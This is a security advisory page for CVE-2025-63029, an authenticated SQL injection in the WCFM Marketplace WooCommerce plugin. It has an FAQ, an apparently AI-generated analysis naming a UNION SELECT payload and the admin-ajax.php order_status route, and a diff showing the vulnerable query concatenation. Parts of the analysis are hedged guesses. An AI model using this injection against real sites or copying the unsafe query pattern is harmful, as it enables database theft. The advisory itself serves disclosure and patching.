What is CVE-2025-63029?

CVE-2025-63029 is a SQL Injection vulnerability found in the WCFM Marketplace plugin for WooCommerce, affecting versions up to 3.7.1. This vulnerability allows authenticated users with vendor-level access to manipulate SQL queries, potentially extracting sensitive information from the database.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization in the `wcfmmp_vendor_order_status_condition` function. Attackers can inject arbitrary SQL code into existing queries by exploiting user-controlled parameters, allowing them to extract data from the database.

Who is affected by this vulnerability?

Any WordPress site using the WCFM Marketplace plugin version 3.7.1 or earlier is affected. Specifically, authenticated users with store vendor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WCFM Marketplace plugin installed. If it is version 3.7.1 or earlier, your site is at risk. Additionally, review logs for any suspicious activity related to SQL queries.

How can I fix this vulnerability?

To fix this vulnerability, update the WCFM Marketplace plugin to version 3.7.2 or later, where the issue has been patched. Ensure that all plugins and themes are kept up to date to minimize security risks.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk if exploited. It is advisable to address vulnerabilities with this score promptly to protect sensitive data.

What is SQL Injection?

SQL Injection is a code injection technique that allows attackers to interfere with the queries an application makes to its database. This can lead to unauthorized access to sensitive data, data manipulation, and other malicious activities.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can authenticate as a vendor and exploit the SQL Injection vulnerability by crafting a malicious payload. This payload can be sent through AJAX requests to manipulate the database and extract sensitive information.

What are the potential risks of exploitation?

If successfully exploited, an attacker could access sensitive data such as user credentials and session tokens, leading to account takeovers, privilege escalation, or further compromises of the website.

How can I protect my site from similar vulnerabilities in the future?

To protect your site, regularly update all themes and plugins, implement security measures such as web application firewalls, and conduct regular security audits. Additionally, consider using security plugins that can help detect and mitigate vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2025-63029 can be found on the official CVE database, security advisories from the plugin developers, and security-focused websites that provide vulnerability analyses.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the WCFM Marketplace plugin temporarily or restricting access to authenticated users until the patch can be applied. Additionally, monitor your site’s logs for any suspicious activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2025-63029: WCFM Marketplace – Multivendor Marketplace for WooCommerce <= 3.7.1 – Authenticated (Store vendor+) SQL Injection (wc-multivendor-marketplace)

CVE ID CVE-2025-63029

Plugin wc-multivendor-marketplace

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 3.7.1

Patched Version 3.7.2

Disclosed April 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-63029:
This vulnerability allows authenticated attackers with store vendor-level access to perform SQL injection within the WCFM Marketplace plugin for WordPress, versions up to and including 3.7.1. The flaw resides in the lack of proper escaping and parameterized queries when handling user-supplied input, enabling attackers to append arbitrary SQL to existing queries and extract sensitive database information.

The root cause is insufficient input sanitization and preparation of SQL queries in the `wcfmmp_vendor_order_status_condition` function located in `/wc-multivendor-marketplace/core/class-wcfmmp-vendor.php`. The function constructs SQL conditions by directly concatenating the `$status` variable, which is populated from user-controlled data (likely via the `order_status` parameter) without using prepared statements or proper escaping. This allows an attacker to inject SQL code into the query sent to the database.

Exploitation requires an authenticated vendor-level user who can craft a malicious payload, such as `’ UNION SELECT … –`, within the vulnerable parameter. The attacker may trigger the function through order-related AJAX actions or endpoints that invoke `wcfmmp_vendor_order_status_condition`, for example, by manipulating order status filters in the vendor dashboard. A tool like cURL or a crafted HTTP request to `/wp-admin/admin-ajax.php` with the appropriate action and malicious `order_status` parameter can execute the injection.

The patch (as shown in the diff) introduces proper validation and sanitization of the input, likely by switching to parameterized queries with `$wpdb->prepare()` or by whitelisting allowed statuses. Before the patch, raw user input was concatenated directly into SQL strings; after the patch, the input is properly escaped or validated against an allowed list, preventing SQL injection.

The impact of successful exploitation is severe: an attacker can extract sensitive data from the WordPress database, including user credentials, session tokens, and other confidential information. This could lead to privilege escalation, account takeover, or further compromise of the entire site.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wc-multivendor-marketplace/core/class-wcfmmp-vendor.php
+++ b/wc-multivendor-marketplace/core/class-wcfmmp-vendor.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * WCFMmp plugin core
  *
@@ -8,2753 +9,2810 @@
  * @package 	wcfmmp/core
  * @version   1.0.0
  */
-
+
 class WCFMmp_Vendor {
-
-	public function __construct() {
-		global $WCFM;
-
-		if( !wcfm_is_vendor() ) {
-			// Vendor Listing Page
-			add_filter( 'wcfm_vendors_display_name_data', array( &$this, 'wcfmmp_vendors_listing_profile_info' ), 50, 2 );
-
-			// Vendor Details Page - Store Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_marketplace_setting' ) );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_marketplace_setting' ) );
-
-			// Vendor Details Page - Store Shiping Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_shipping_setting' ), 12 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_shipping_setting' ), 12 );
-
-			// Vendor Details Page - Store Cimmission & Withdrawal Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_commission_setting' ), 13 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_commission_setting' ), 13 );
-
-			// Vendor Details Page - Store Hours & Vacation Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_store_hours_setting' ), 14 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_store_hours_setting' ), 14 );
-
-			// Vendor Details Page - Store SEO & Social Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_store_seo_social_setting' ), 14 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_store_seo_social_setting' ), 14 );
-
-			// Vendor Details Page - Store Policies & Customer Support Setting
-			add_action( 'begin_wcfm_vendors_new_form', array( &$this, 'wcfmmp_vendor_manage_store_policy_support_setting' ), 14 );
-			add_action( 'end_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_vendor_manage_store_policy_support_setting' ), 14 );
-
-			// Vendor Manager Order
-			add_action( 'after_wcfm_vendor_direct_message_details', array( &$this, 'wcfmmp_vendor_manage_orders' ), 50, 2 );
-
-			// Bullk Store Assign
-			add_action( 'woocommerce_product_bulk_edit_end', array( &$this, 'wcfmmp_bulk_store_edit' ) );
-			add_action( 'wcfm_product_bulk_edit_end', array( &$this, 'wcfmmp_bulk_store_edit' ) );
-			add_action( 'woocommerce_product_bulk_edit_save', array( &$this, 'wcfmmp_bulk_store_edit_save' ) );
-			add_action( 'wcfm_product_bulk_edit_save', array( &$this, 'wcfmmpu_bulk_store_edit_save' ), 10, 2 );
-		}
-
-		// Vendor Profile Additional Info
-		if( apply_filters( 'wcfmmp_is_allow_manage_registration_additional_infos', true ) ) {
-			if( wcfm_is_vendor() ) {
-				add_action( 'end_wcfm_user_profile', array( &$this, 'wcfmmp_profile_additional_info' ), 75 );
-			}
-			add_action( 'after_wcfm_vendors_manage_form', array( &$this, 'wcfmmp_profile_additional_info' ), 12 );
-			add_action( 'wcfm_profile_update', array( &$this, 'wcfmmp_profile_additional_info_update' ), 75, 2 );
-			add_action( 'wcfm_vendor_manage_profile_update', array( &$this, 'wcfmmp_profile_additional_info_update' ), 75, 2 );
-		}
-
-		// wePOS Compatibility
-		add_filter( 'wepos_frontend_permissions', array( &$this, 'wcfmmp_is_allow_wepos' ), 50 );
-		add_filter( 'wepos_rest_manager_permissions', array( &$this, 'wcfmmp_is_allow_wepos' ), 50 );
-		add_filter( 'woocommerce_rest_check_permissions', array( &$this, 'wcfmmp_is_allow_wepos_rest_check_permissions' ), 50, 4 );
-		add_filter( 'woocommerce_rest_product_object_query', array( &$this, 'wcfmmp_wepos_product_query' ), 50, 2 );
-
-		// Enable Vendor Order Email Notification
-		//add_filter( 'wcfm_is_allow_order_notification_email', array( &$this, 'wcfmmp_is_allow_order_notification_email' ) );
-
-		// Vendor Withdrawal Request Auto Apptove
-		add_filter( 'wcfmmp_is_withdrawal_auto_approve', array( &$this, 'wcfmmp_is_vendor_withdrawal_auto_approve' ), 10, 2 );
-
-		// Vendor Withdrawal Limit
-		add_filter( 'wcfmmp_withdrawal_limit', array( &$this, 'wcfmmp_vendor_withdrawal_limit' ), 10, 2 );
-
-		// Vendor Withdrawal Thresold
-		add_filter( 'wcfmmp_withdrawal_thresold', array( &$this, 'wcfmmp_vendor_withdrawal_thresold' ), 10, 2 );
-
-		// Vendor Withdrawal Charges
-		add_filter( 'wcfmmp_withdrawal_charges', array( &$this, 'wcfmmp_charges_withdrawal_charges' ), 10, 3 );
-
-		// Modify Vendor Order Status List
-		add_filter( 'wcfm_allowed_order_status',  array( &$this, 'wcfmmp_allowed_order_status' ) );
-
-		// Vendor Order Current Status
-		add_filter( 'wcfm_current_order_status', array( &$this, 'wcfmmp_vendor_current_order_status' ), 10, 2 );
-
-		// Vendor Order Status Condition Check
-		add_filter( 'wcfm_order_status_condition', array( &$this, 'wcfmmp_vendor_order_status_condition' ), 10, 2 );
-
-		// Sold By label
-		add_filter( 'wcfm_sold_by_label', array( &$this, 'sold_by_label' ), 10, 2 );
-
-		// Vendor Order Status change enable
-		add_filter( 'wcfm_is_allow_order_status_change_active', array( &$this, 'wcfmmp_is_allow_order_status_change_active' ), 10, 3 );
-
-		// Modify Vendor Orders Menu
-		add_filter( 'wcfmu_orders_menus',  array( &$this, 'wcfmmp_orders_menus' ) );
-
-		// Vendor order item repair
-		add_action( 'wcfm_order_repair_order_item', array( &$this, 'wcfmmp_order_repair_order_item' ) );
-
-		// Vendor Details In Order Eamail
-		if( apply_filters( 'wcfm_is_allow_policy_under_order_details', true ) ) {
-			add_action( 'woocommerce_order_details_after_order_table', array( &$this, 'wcfmmp_vendor_details_in_order' ), 20, 4 );
-		}
-		if( apply_filters( 'wcfm_is_allow_policy_under_order_emails', true ) ) {
-			add_action( 'woocommerce_email_order_meta', array( &$this, 'wcfmmp_vendor_details_in_order' ), 20, 4 );
-		}
-
-		// Store Info In Order Details Item
-		add_action( 'woocommerce_display_item_meta', array( &$this, 'wcfmmp_order_item_meta_store' ), 10, 3 );
-
-		// Store Off Line Store List Action
-		add_filter( 'wcfm_vendors_actions', array( &$this, 'wcfmmp_vendors_actions' ), 50, 2 );
-
-		// Store Purchase Disable if Store Offline
-		add_filter( 'woocommerce_is_purchasable', array( &$this, 'wcfmmp_product_store_is_offline' ), 750, 2 );
-		add_action( 'woocommerce_single_product_summary', array( &$this, 'wcfmmp_product_store_is_offline_addtocart_disable' ), 29 );
-
-		// Load Vendor Store Setup widget on first login
-		add_action( 'template_redirect', array( &$this, 'wcfmmp_store_setup_on_first_login' ), 750 );
-
-		// Vendor Profile complete percent
-		add_action( 'before_wcfm_marketplace_settings', array( &$this, 'wcfmmp_vendor_profile_complete_percent' ) );
-
-		// Vendor Product Archives for Disable or Offline Store
-		add_action( 'wcfm_vendor_disable_after', array( &$this, 'wcfmmp_vendor_product_offline' ) );
-		add_action( 'wcfm_store_offline_after', array( &$this, 'wcfmmp_vendor_product_offline' ) );
-
-		// Vendor Product Enable for Enable or Online Store
-		add_action( 'wcfm_vendor_enable_after', array( &$this, 'wcfmmp_vendor_product_online' ) );
-		add_action( 'wcfm_store_online_after', array( &$this, 'wcfmmp_vendor_product_online' ) );
-
-		// Product Stock Notification
-		add_filter( 'woocommerce_email_recipient_low_stock', array( &$this, 'wcfmmp_vendor_product_stock_notification' ), 50, 2 );
-		add_filter( 'woocommerce_email_recipient_no_stock', array( &$this, 'wcfmmp_vendor_product_stock_notification' ), 50, 2 );
-
-		// Radius Search User Query
-		add_action( 'pre_user_query', array( &$this, 'wcfmmp_pre_user_radius_query' ), 50 );
-
-		// Multiple Vendors Prdocuct Checkout Validation
-		add_action( 'woocommerce_add_to_cart_validation', array( &$this, 'wcfmmp_multivendor_order_validation' ), 500, 3 );
-
-		// Multiple Vendors YITH Request a Quote Restriction
-		if( apply_filters( 'wcfm_is_allow_multivendor_request_quote_validation', true ) ) {
-			add_filter( 'ywraq_ajax_add_item_is_valid', array( &$this, 'wcfmmp_multivendor_request_quote_validation' ), 500, 2 );
-		}
-
-		// On Product Delete Reset Store Taxonomy
-		add_action( 'delete_post', array( &$this, 'wcfmmp_delete_product_taxonomy' ) );
-		add_action( 'wp_trash_post', array( &$this, 'wcfmmp_delete_product_taxonomy' ) );
-		add_action( 'before_delete_post', array( &$this, 'wcfmmp_delete_product_taxonomy' ) );
-
-	}
-
-	public function get_vendor_name_position( $vendor_id ) {
-		global $WCFM, $WCFMmp;
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$global_store_name_position = isset( $WCFMmp->wcfmmp_marketplace_options['store_name_position'] ) ? $WCFMmp->wcfmmp_marketplace_options['store_name_position'] : 'on_banner';
-		$store_name_position = isset( $vendor_data['store_name_position'] ) ? esc_attr( $vendor_data['store_name_position'] ) : $global_store_name_position;
-		return $store_name_position;
-	}
-
-	/**
-	 * Return is show store sidebar
-	 * @return boolean
-	 */
-	public function is_store_sidebar() {
-		global $WCFM, $WCFMmp;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$store_sidebar = isset( $wcfmmp_marketplace_options['store_sidebar'] ) ? $wcfmmp_marketplace_options['store_sidebar'] : 'yes';
-		if( $store_sidebar == 'yes' ) return apply_filters( 'wcfmmp_is_store_sidebar', true );
-		return apply_filters( 'wcfmmp_is_store_sidebar', false );
-	}
-
-	/**
-	 * Return is show store list sidebar
-	 * @return boolean
-	 */
-	public function is_store_lists_sidebar() {
-		global $WCFM, $WCFMmp;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$store_list_sidebar = isset( $wcfmmp_marketplace_options['store_list_sidebar'] ) ? $wcfmmp_marketplace_options['store_list_sidebar'] : 'no';
-		if( $store_list_sidebar == 'yes' ) return apply_filters( 'wcfmmp_is_store_lists_sidebar', true );
-		return apply_filters( 'wcfmmp_is_store_lists_sidebar', false );
-	}
-
-	/**
-	 * Return is show sold by label
-	 * @return boolean
-	 */
-	public function is_vendor_sold_by( $vendor_id = '' ) {
-		global $WCFM, $WCFMmp;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$vendor_sold_by = isset( $wcfmmp_marketplace_options['vendor_sold_by'] ) ? $wcfmmp_marketplace_options['vendor_sold_by'] : 'yes';
-		if( $vendor_sold_by == 'yes' ) {
-			if( !$vendor_id || ( $vendor_id && apply_filters( 'wcfmmp_is_allow_sold_by', true, $vendor_id ) && wcfm_vendor_has_capability( $vendor_id, 'sold_by' ) ) ) {
-				return true;
-			} else {
-				return false;
-			}
-		}
-		return false;
-	}
-
-	public function get_vendor_sold_by_template() {
-		global $WCFM, $WCFMmp;
-		$vendor_sold_by_template = isset( $WCFMmp->wcfmmp_marketplace_options['vendor_sold_by_template'] ) ? $WCFMmp->wcfmmp_marketplace_options['vendor_sold_by_template'] : 'advanced';
-		return $vendor_sold_by_template;
-	}
-
-	public function sold_by_label( $vendor_id = '', $sold_by_text = '' ) {
-		global $WCFM, $WCFMmp;
-
-		$sold_by_label = isset( $WCFMmp->wcfmmp_marketplace_options['sold_by_label'] ) ? $WCFMmp->wcfmmp_marketplace_options['sold_by_label'] : __('Store', 'wc-multivendor-marketplace');
-
-		if( $vendor_id ) {
-			$vendor_capability_options = (array) apply_filters( 'wcfmgs_user_capability', get_option( 'wcfm_capability_options' ), $vendor_id );
-			$sold_by_label             = ( isset( $vendor_capability_options['sold_by_label'] ) ) ? $vendor_capability_options['sold_by_label'] : $sold_by_label;
-		}
-
-		if( !$sold_by_label ) $sold_by_label = __('Store', 'wc-multivendor-marketplace');
-
-		return apply_filters( 'wcfmmp_sold_by_label', $sold_by_label, $vendor_id );
-	}
-
-	/**
-	 * Return vendor's payment method
-	 */
-	public function get_vendor_payment_method( $vendor_id = 0 ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) {
-			$vendor_id = $WCFMmp->vendor_id;
-		}
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$payment_method = isset( $vendor_data['payment']['method'] ) ? esc_attr( $vendor_data['payment']['method'] ) : '' ;
-		return $payment_method;
-	}
-
-	/**
-	 * Return vendor's Payment Email
-	 */
-	public function get_vendor_payment_account( $vendor_id = 0, $account = 'paypal' ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) {
-			$vendor_id = $WCFMmp->vendor_id;
-		}
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$account_email = isset( $vendor_data['payment'][$account]['email'] ) ? esc_attr( $vendor_data['payment'][$account]['email'] ) : '' ;
-		return $account_email;
-	}
-
-	/**
-	 * Return vendor's Bank Detais
-	 */
-	public function get_vendor_bank_details( $vendor_id = 0 ) {
-		global $WCFM, $WCFMmp;
-
-		if( !$vendor_id ) {
-			$vendor_id = $WCFMmp->vendor_id;
-		}
-		$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-		$bank_details = isset( $vendor_data['payment']['bank'] ) ? $vendor_data['payment']['bank'] : array();
-		return $bank_details;
-	}
-
-	public function wcfmmp_get_vendor_billing_details( $vendor_id, $billing_option ) {
-
-  	if( !$vendor_id ) return;
-  	if( !$billing_option ) return;
-
-  	if( $billing_option == 'bank_transfer' ) $billing_option = 'bank';
-
-  	$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-  	if( !$vendor_data ) $vendor_data = array();
-
-  	$billing_details  = isset( $vendor_data['payment'][$billing_option] ) ? $vendor_data['payment'][$billing_option] : array();
-  	$billing_details  = implode( ", ", $billing_details );
-
-  	return $billing_details;
-  }
-
-	/**
-	 * Enable New Order Email Notification to Vendors
-	 */
-	function wcfmmp_is_allow_order_notification_email( $is_allow ) {
-		return true;
-	}
-
-	/**
-	 * Vendor Withdrawal Request Auto Approve
-	 */
-	function wcfmmp_is_vendor_withdrawal_auto_approve( $is_auto_approve, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-			$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-			if( $vendor_withdrawal_mode != 'global' ) {
-				$is_auto_approve = isset( $vendor_data['withdrawal']['request_auto_approve'] ) ? $vendor_data['withdrawal']['request_auto_approve'] : 'no';
-				if( $is_auto_approve == 'yes' ) $is_auto_approve = true;
-				else $is_auto_approve = false;
-			}
-		}
-		return $is_auto_approve;
-	}
-
-	/**
-	 * Vendor Withdrawal Limit
-	 */
-	function wcfmmp_vendor_withdrawal_limit( $withdrawal_limit, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-			$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-			if( $vendor_withdrawal_mode != 'global' ) {
-				$withdrawal_limit = isset( $vendor_data['withdrawal']['withdrawal_limit'] ) ? $vendor_data['withdrawal']['withdrawal_limit'] : 0;
-			}
-		}
-		return $withdrawal_limit;
-	}
-
-	/**
-	 * Vendor Withdrawal Thresold
-	 */
-	function wcfmmp_vendor_withdrawal_thresold( $withdrawal_thresold, $vendor_id ) {
-		global $WCFM, $WCFMmp;
-
-		if( $vendor_id ) {
-			$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-			$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-			if( $vendor_withdrawal_mode != 'global' ) {
-				$withdrawal_thresold = isset( $vendor_data['withdrawal']['withdrawal_thresold'] ) ? $vendor_data['withdrawal']['withdrawal_thresold'] : '';
-			}
-		}
-		return $withdrawal_thresold;
-	}
-
-	/**
-	 * Vendor Withdrawal Charges
-	 */
-	function wcfmmp_charges_withdrawal_charges( $withdrawal_charges, $amount, $vendor_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		if( $vendor_id && $amount ) {
-			$payment_method = $WCFMmp->wcfmmp_vendor->get_vendor_payment_method( $vendor_id );
-			if( $payment_method ) {
-				if ( array_key_exists( $payment_method, $WCFMmp->wcfmmp_gateways->payment_gateways ) ) {
-					$vendor_data = get_user_meta( $vendor_id, 'wcfmmp_profile_settings', true );
-					$vendor_withdrawal_mode = isset( $vendor_data['withdrawal']['withdrawal_mode'] ) ? $vendor_data['withdrawal']['withdrawal_mode'] : 'global';
-					if( $vendor_withdrawal_mode != 'global' ) {
-
-						$withdrawal_charge_type = isset( $vendor_data['withdrawal']['withdrawal_charge_type'] ) ? $vendor_data['withdrawal']['withdrawal_charge_type'] : 'no';
-
-						$vendor_withdrawal_charge   = isset( $vendor_data['withdrawal']['withdrawal_charge'] ) ? $vendor_data['withdrawal']['withdrawal_charge'] : array();
-						$withdrawal_charge_gateway  = isset( $vendor_withdrawal_charge[$payment_method] ) ? $vendor_withdrawal_charge[$payment_method][0] : array();
-						$withdrawal_percent_charge  = isset( $withdrawal_charge_gateway['percent'] ) ? $withdrawal_charge_gateway['percent'] : 0;
-						$withdrawal_fixed_charge    = isset( $withdrawal_charge_gateway['fixed'] ) ? $withdrawal_charge_gateway['fixed'] : 0;
-						$withdrawal_charge_tax      = isset( $withdrawal_charge_gateway['tax'] ) ? $withdrawal_charge_gateway['tax'] : 0;
-
-						switch( $withdrawal_charge_type ) {
-							case 'no':
-								$withdrawal_charges = 0;
-							break;
-
-							case 'fixed':
-								$withdrawal_charges = (float) $withdrawal_fixed_charge;
-							break;
-
-							case 'percent':
-								$withdrawal_charges = (float) $amount * ( (float) $withdrawal_percent_charge/100 );
-							break;
-
-							case 'percent_fixed':
-								$withdrawal_charges  = (float) $amount * ( (float) $withdrawal_percent_charge/100 );
-								$withdrawal_charges += (float) $withdrawal_fixed_charge;
-							break;
-
-							default:
-								$withdrawal_charges = 0;
-							break;
-						}
-
-						if( $withdrawal_charges && $withdrawal_charge_tax ) {
-							$withdrawal_tax      = (float) $withdrawal_charges * ( (float) $withdrawal_charge_tax/100 );
-							$withdrawal_charges += (float) $withdrawal_tax;
-						}
-
-						if( $withdrawal_charges ) {
-							$withdrawal_charges = round( $withdrawal_charges, 2 );
-						}
-					}
-				}
-			}
-		}
-		return $withdrawal_charges;
-
-	}
-
-	/**
-	 * Modify Vendor's order status list
-	 */
-	function wcfmmp_allowed_order_status( $order_status ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		if( wcfm_is_vendor() ) {
-			if( WCFMmp_Dependencies::wcfm_plugin_active_check() && WCFM_Dependencies::wcfmu_plugin_active_check() ) {
-				if( apply_filters( 'wcfm_is_pref_shipment_tracking', true ) && apply_filters( 'wcfm_is_allow_shipping_tracking', true ) ) {
-					$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-					$order_sync  = isset( $wcfmmp_marketplace_options['order_sync'] ) ? $wcfmmp_marketplace_options['order_sync'] : 'no';
-					if( $order_sync != 'yes' ) {
-						$order_vendor_status = apply_filters( 'wcfmmp_vendor_order_status',
-																									array(
-																										'wc-shipped' => __( 'Shipped', 'wc-multivendor-marketplace' )
-																										)
-																								);
-						$order_status = array_merge( $order_status, $order_vendor_status );
-					}
-				}
-			}
-
-			if( !apply_filters( 'wcfm_is_allow_refund_requests', true ) ) {
-				if( isset( $order_status['wc-refunded'] ) ) unset( $order_status['wc-refunded'] );
-			}
-			if( isset( $order_status['wc-cancelled'] ) ) unset( $order_status['wc-cancelled'] );
-			if( isset( $order_status['wc-failed'] ) ) unset( $order_status['wc-failed'] );
-		}
-		return $order_status;
-	}
-
-	/**
-	 * Return vendor order current status
-	 */
-	function wcfmmp_vendor_current_order_status( $order_status, $order_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$order_sync  = isset( $wcfmmp_marketplace_options['order_sync'] ) ? $wcfmmp_marketplace_options['order_sync'] : 'no';
-		if( $order_sync != 'yes' ) {
-			if( wcfm_is_vendor() ) {
-				$vendor_id = $WCFMmp->vendor_id;
-				$sql = 'SELECT order_status, GROUP_CONCAT(commission_status) commission_statuses, GROUP_CONCAT(is_refunded) is_refundeds, GROUP_CONCAT(refund_status) refund_statuses  FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-				$sql .= ' WHERE 1=1';
-				$sql .= " AND `order_id` = %d";
-				$sql .= " AND `vendor_id` = %d";
-				$commissions = $wpdb->get_results($wpdb->prepare($sql, [$order_id, $vendor_id]));
-				$product_id = 0;
-				if( !empty( $commissions ) ) {
-					foreach( $commissions as $commission ) {
-						$commission_statuses = explode( ",", $commission->commission_statuses );
-						$refund_statuses = explode( ",", $commission->refund_statuses );
-						$is_refundeds = explode( ",", $commission->is_refundeds );
-
-						$order_status = $commission_statuses[0];
-					}
-				}
-				return apply_filters( 'wcfmmp_vendor_current_order_status', $order_status, $order_id, $vendor_id );
-			}
-		}
-		return $order_status;
-	}
-
-	/**
-	 * Vendor Order Status Condition depending upon Order Sync Comdition
-	 */
-	function wcfmmp_vendor_order_status_condition( $condition, $table_handler ) {
-		global $WCFMmp, $WCFM_Query;
-		$wcfmmp_marketplace_options   = wcfm_get_option( 'wcfm_marketplace_options', array() );
-		$order_sync  = isset( $wcfmmp_marketplace_options['order_sync'] ) ? $wcfmmp_marketplace_options['order_sync'] : 'no';
-		$status = get_wcfm_marketplace_active_withdrwal_order_status_in_comma();
-
-		// Adding "refunded" status only for reports page
-		if ( ! is_null( $WCFM_Query ) && !is_admin() && is_page() && is_wcfm_page() ) {
-			$current_endpoint = $WCFM_Query->get_current_endpoint();
-			if( (wcfm_is_vendor() && !$current_endpoint) || in_array( $current_endpoint, array( 'wcfm-reports-sales-by-date', 'wcfm-reports-sales-by-vendor' ) ) ) {
-				$status .= ", 'refunded'";
-			}
-		}
-
-		if( $order_sync == 'yes' ) {
-		  $condition = " AND {$table_handler}.order_status IN ({$status})";
-		} else {
-			$condition = " AND {$table_handler}.commission_status IN ({$status})";
-		}
-		return $condition;
-	}
-
-	/**
-	 * Vendor Order Status Active
-	 */
-	function wcfmmp_is_allow_order_status_change_active( $is_allow, $order_id, $order ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		$vendor_id = $WCFMmp->vendor_id;
-		if( wcfm_is_vendor() ) {
-			$sql = 'SELECT GROUP_CONCAT(commission_status) commission_statuses, GROUP_CONCAT(is_refunded) is_refundeds, GROUP_CONCAT(refund_status) refund_statuses  FROM ' . $wpdb->prefix . 'wcfm_marketplace_orders AS commission';
-			$sql .= ' WHERE 1=1';
-			$sql .= " AND `order_id` = %d";
-			$sql .= " AND `vendor_id` = %d";
-			$commissions = $wpdb->get_results( $wpdb->prepare( $sql, $order_id, $vendor_id ) );
-			$product_id = 0;
-			if( !empty( $commissions ) ) {
-				foreach( $commissions as $commission ) {
-
-					$commission_statuses = explode( ",", $commission->commission_statuses );
-					$refund_statuses = explode( ",", $commission->refund_statuses );
-					$is_refundeds = explode( ",", $commission->is_refundeds );
-
-					if( !in_array( 0, $is_refundeds ) ) $is_allow = 0;
-					if( in_array( 'requested', $refund_statuses ) ) $is_allow = 0;
-				}
-			}
-		}
-
-		return $is_allow;
-	}
-
-	/**
-	 * Modify Vendor's orders menu
-	 */
-	function wcfmmp_orders_menus( $order_menus ) {
-		if( wcfm_is_vendor() ) {
-			$order_vendor_menus = apply_filters( 'wcfmmp_vendor_order_menus',
-																						array(
-																							'pending' => __( 'Pending', 'wc-multivendor-marketplace' ),
-																							'shipped' => __( 'Shipped', 'wc-multivendor-marketplace' )
-																							)
-																					);
-			$order_menus = array_merge( $order_menus, $order_vendor_menus );
-			if( isset( $order_menus['cancelled'] ) ) unset( $order_menus['cancelled'] );
-			if( isset( $order_menus['failed'] ) ) unset( $order_menus['failed'] );
-		}
-		return $order_menus;
-	}
-
-	public function wcfmmp_vendor_order_status_name( $order_ststus ) {
-		$order_vendor_status = $this->wcfmmp_allowed_order_status( wc_get_order_statuses() );
-		if( isset( $order_vendor_status[$order_ststus] ) ) return $order_vendor_status[$order_ststus];
-		if( isset( $order_vendor_status['wc-'.$order_ststus] ) ) return $order_vendor_status['wc-'.$order_ststus];
-		return ucfirst( $order_ststus );
-	}
-
-	/**
-	 * Vendor Order invalid item repair
-	 */
-	function wcfmmp_order_repair_order_item( $order_id ) {
-		global $WCFM, $WCFMmp, $wpdb;
-
-		$order = wc_get_order( $order_id );
-		if( !is_a( $order, 'WC_Order' ) ) return;
-
-		$items = $order->get_items( 'line_item' );
-    if( !empty( $items ) ) {
-			foreach( $items as $item_key => $item ) {
-				$order_item_id = $item_id = $item->get_id();
-				$line_item = new WC_Order_Item_Product( $item );
-				$product  = $line_item->get_product();
-				$product_id = $line_item->get_product_id();
-				$variation_id = $line_item->get_variation_id();
-
-				if( $product_id ) {
